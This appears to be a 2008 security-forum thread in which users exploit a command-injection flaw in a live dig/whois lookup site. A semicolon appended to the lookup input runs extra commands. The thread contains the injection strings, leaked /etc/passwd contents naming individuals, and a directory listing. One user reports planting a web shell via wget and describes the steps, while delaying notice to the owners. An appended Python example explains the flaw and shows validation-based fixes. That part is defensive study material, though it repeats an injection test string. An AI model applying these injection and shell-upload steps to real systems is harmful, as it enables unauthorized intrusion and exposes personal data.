Waraxe IT Security Portal  
Hmm question
Posted: Sat Jun 07, 2008 3:05 am
Chedda (Active user)
Joined: May 26, 2008
Posts: 27

So I was browsing around looking for a good place for a wannabe hacker. I came across this, but wasn't given any information on how it's performed. I have been looking elsewhere to find more information on this exploit and I think I found something, but I'm not even sure if it's correct. "whois.net is running a shell command, you can end one and start another. You'd do that by adding a semicolon to the Dig arguments."

So I tried such commands as website.com;ls -a and it actually works, but not like the below. Can anyone fill in the gaps?


Quote:

You Are Searching For ***censored due to it being a spoiler*** /etc/passwd:

; <<>> DiG 9.2.3 <<>>
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34366
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 14

;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 154054 IN NS G.ROOT-SERVERS.NET.
. 154054 IN NS K.ROOT-SERVERS.NET.
. 154054 IN NS A.ROOT-SERVERS.NET.
. 154054 IN NS I.ROOT-SERVERS.NET.
. 154054 IN NS L.ROOT-SERVERS.NET.
. 154054 IN NS D.ROOT-SERVERS.NET.
. 154054 IN NS C.ROOT-SERVERS.NET.
. 154054 IN NS M.ROOT-SERVERS.NET.
. 154054 IN NS F.ROOT-SERVERS.NET.
. 154054 IN NS H.ROOT-SERVERS.NET.
. 154054 IN NS E.ROOT-SERVERS.NET.
. 154054 IN NS J.ROOT-SERVERS.NET.
. 154054 IN NS B.ROOT-SERVERS.NET.

;; ADDITIONAL SECTION:
K.ROOT-SERVERS.NET. 509993 IN A 193.0.14.129
K.ROOT-SERVERS.NET. 509993 IN AAAA 2001:7fd::1
L.ROOT-SERVERS.NET. 603676 IN A 199.7.83.42
M.ROOT-SERVERS.NET. 603676 IN A 202.12.27.33
M.ROOT-SERVERS.NET. 603676 IN AAAA 2001:dc3::35
A.ROOT-SERVERS.NET. 603676 IN A 198.41.0.4
A.ROOT-SERVERS.NET. 603676 IN AAAA 2001:503:ba3e::2:30
B.ROOT-SERVERS.NET. 602195 IN A 192.228.79.201
C.ROOT-SERVERS.NET. 602195 IN A 192.33.4.12
D.ROOT-SERVERS.NET. 509993 IN A 128.8.10.90
E.ROOT-SERVERS.NET. 603676 IN A 192.203.230.10
F.ROOT-SERVERS.NET. 514317 IN A 192.5.5.241
F.ROOT-SERVERS.NET. 514317 IN AAAA 2001:500:2f::f
G.ROOT-SERVERS.NET. 514317 IN A 192.112.36.4

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue May 20 23:05:41 2008
;; MSG SIZE rcvd: 500

# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
webadmin:*:79:79:Web Admin:/usr/local/apache:/bin/csh
www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
websitetools:*:1001:1001:Administrative User:/home/websitetools:/bin/tcsh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
dgudema:*:1002:1002:Daniel Gudema:/home/dgudema:/bin/tcsh
bibana:*:1003:1003:Bryant Ibana:/home/bibana:/usr/local/bin/bash
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin


Last edited by Chedda on Sun Jun 08, 2008 12:39 am; edited 1 time in total

Posted: Sat Jun 07, 2008 7:16 am
gibbocool (Advanced user)
Joined: Jan 22, 2008
Posts: 208

Interesting, good find. You could now use wget and upload a shell.
How did you find this vulnerability?


And btw, no links to vulnerable sites.

_________________
http://www.gibbocool.com

Posted: Sat Jun 07, 2008 4:41 pm
Chedda (Active user)
Joined: May 26, 2008
Posts: 27

I was merely googling random things about hacking in general and came across it on a forum. I didn't really find anything; someone else did all the work. The forum is dead though, and the post is a couple of months old. They never said what they did to accomplish this, so I was wondering if you knew what command they used?


Code:
website.com;ls -a
only returns

Quote:
You Are Searching For ****.com;ls -a:

; <<>> DiG 9.2.3 <<>> ****.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60077
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;****.com. IN A

;; ANSWER SECTION:
****.com. 43200 IN A 65.162.***.***

;; AUTHORITY SECTION:
****.com. 43200 IN NS ns2.address.com.
****.com. 43200 IN NS ns1.address.com.

;; Query time: 104 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Jun 7 16:39:40 2008
;; MSG SIZE rcvd: 85

.
..
.htaccess
Application.php
Browsersize.URL
admin
back.jpg
circuit.dtd
circuit.xml
dspHelloWorld.php
dspTesting.php
dsp_about.php
fusebox.dtd
fusebox.init.php
fusebox.xml
fusebox4.loader.php4.php
fusebox4.parser.php4.php
fusebox4.runtime.php4.php
fusebox4.transformer.php4.php
includes
index.php
index_old.html
ipaddress
layFooter.php
layHeader.php
layouts
left.jpg
lib
manual
parsed
ping
plugins
protolize
right.jpg
seo
tools
udf_canonicalpath.php
udf_relativefilepath.php
validator
websites
websitetools.css
whois
whois.net

Posted: Sat Jun 07, 2008 6:08 pm
pexli (Valuable expert)
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Try website.com;pwd

Posted: Sun Jun 08, 2008 12:15 am
gibbocool (Advanced user)
Joined: Jan 22, 2008
Posts: 208

I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously, who would want to be malicious against a site like that?

_________________
http://www.gibbocool.com

Posted: Sun Jun 08, 2008 12:33 am
Chedda (Active user)
Joined: May 26, 2008
Posts: 27

gibbocool wrote:
I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously, who would want to be malicious against a site like that?


Hehe, glad to see someone got some use out of it. As far as I am concerned you can email them; I will never figure out how to use it, sadly.

Posted: Sun Jun 08, 2008 4:50 am
gibbocool (Advanced user)
Joined: Jan 22, 2008
Posts: 208

Quite simple, it's just a matter of knowing Unix commands. If you don't know them, I advise you to install Linux, such as Ubuntu, and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.

_________________
http://www.gibbocool.com

Posted: Sun Jun 08, 2008 5:00 am
Chedda (Active user)
Joined: May 26, 2008
Posts: 27

gibbocool wrote:
Quite simple, it's just a matter of knowing Unix commands. If you don't know them, I advise you to install Linux, such as Ubuntu, and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.


Why can't I even be as cool as you, Gibbocool? You make everything so simple, love it!

Posted: Wed Jun 11, 2008 5:40 pm
Kazuma (Beginner)
Joined: May 17, 2008
Posts: 3
Location: Zwollywood

No success for me on multiple websites. It just returns a list of my local machine Laughing
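
The root cause named in the first post (the lookup page pastes its input into a shell command line, so a semicolon ends dig and starts a second command) and the server-side fix, as an added example that is not part of the thread or the site's own code. The function names, the /usr/bin/dig path and the sample inputs are assumptions constructed for illustration.

```python
import re
import subprocess

# One DNS label: letters, digits, hyphens; no leading/trailing hyphen; 1-63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# At least two labels, optional trailing dot. Nothing a shell or dig treats specially.
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})+\.?")


def vulnerable_command(name):
    """The flawed pattern: user input concatenated into a string a shell will parse."""
    return "dig " + name  # a ';' in name ends dig and begins another command


def validate_hostname(name):
    """Return name if it is a plain DNS hostname, otherwise raise ValueError."""
    if len(name) > 253 or not _HOSTNAME.fullmatch(name):
        raise ValueError(f"rejected lookup target: {name!r}")
    return name


def safe_argv(name):
    """Build an argv list so no shell ever sees the input (dig path is assumed)."""
    return ["/usr/bin/dig", "+noall", "+answer", validate_hostname(name)]


def run_lookup(name):
    """Run dig directly; a list argv with the default shell=False spawns no shell."""
    done = subprocess.run(safe_argv(name), capture_output=True, text=True,
                          timeout=10, check=False)
    return done.stdout


# Constructed inputs: a normal name, the pattern from the thread, and values
# starting with '+' or '@', which dig would read as options even without a shell.
SAMPLES = ["example.com", "example.com;ls -a", "+short", "@192.0.2.1", "a b.com"]


def classify(samples=SAMPLES):
    """Map each sample to True (accepted) or False (rejected)."""
    verdicts = {}
    for sample in samples:
        try:
            validate_hostname(sample)
            verdicts[sample] = True
        except ValueError:
            verdicts[sample] = False
    return verdicts


if __name__ == "__main__":
    for sample, ok in classify().items():
        print(f"{sample!r:24} {'accept' if ok else 'reject'}")
```

Both controls matter: the argv list removes the shell, and the allow-list stops input that dig itself would interpret as an option or server argument.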